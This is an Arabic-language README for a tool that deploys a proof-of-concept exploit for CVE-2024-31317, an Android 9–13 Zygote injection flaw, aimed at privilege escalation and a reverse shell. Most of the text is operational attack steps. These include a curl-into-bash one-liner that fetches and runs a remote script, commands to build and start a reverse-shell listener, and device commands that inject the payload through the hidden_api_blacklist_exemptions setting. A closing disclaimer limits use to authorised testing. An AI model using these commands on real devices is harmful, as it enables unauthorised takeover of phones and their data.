
أداة نشر آلية لـ PoC الخاص بـ CVE-2024-31317 على Android 9-13، تتيح تصعيد الامتيازات عبر حقن Zygote وتنفيذ قشرة عكسية.
أداة نشر لاستغلال إثبات المفهوم (PoC) الخاص بثغرة CVE-2024-31317، وتستهدف أجهزة Android 9 حتى 13.
CVE-2024-31317-PoC-Deployer هو سكربت نشر آلي لإنشاء وتكوين جميع الملفات المطلوبة لاستغلال ثغرة CVE-2024-31317 بسرعة. تؤثر هذه الثغرة على أجهزة Android 9 حتى 13، وتتيح تصعيد الامتيازات وتنفيذ تعليمات برمجية عشوائية عبر عملية Zygote.
reverse_shell.c - برنامج شل عكسي مطبَّق بلغة Cpayload.txt - الحمولة (payload) المصممة خصيصاً لاستغلال الثغرةcompile.sh - سكربت تجميع تلقائيREADME.txt - تعليمات استخدام مفصلةCVE-2024-31317.txt - وثيقة التحليل الفني للثغرةتشغيل سكربت النشر عن بُعد:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
تجميع الشل العكسي:
sh compile.sh
تشغيل مستمع الشل العكسي:
sh reverse_shell
payload.txt إلى المسار /data/local/tmp/ على الجهاز الهدفxxx.xxx.xxx داخل payload.txt بعنوان IP الخاص بخادم الاستماع لديكam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
هذه الأداة مخصّصة لأغراض الاختبارات الأمنية والبحث المشروعة فقط. يجب الحصول على إذن صريح من النظام الهدف قبل الاستخدام. قد يُعدّ الاستخدام غير المصرح به انتهاكاً للقانون. لا يتحمّل المطوّر أي مسؤولية عن أي إساءة استخدام.
هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE لمزيد من التفاصيل.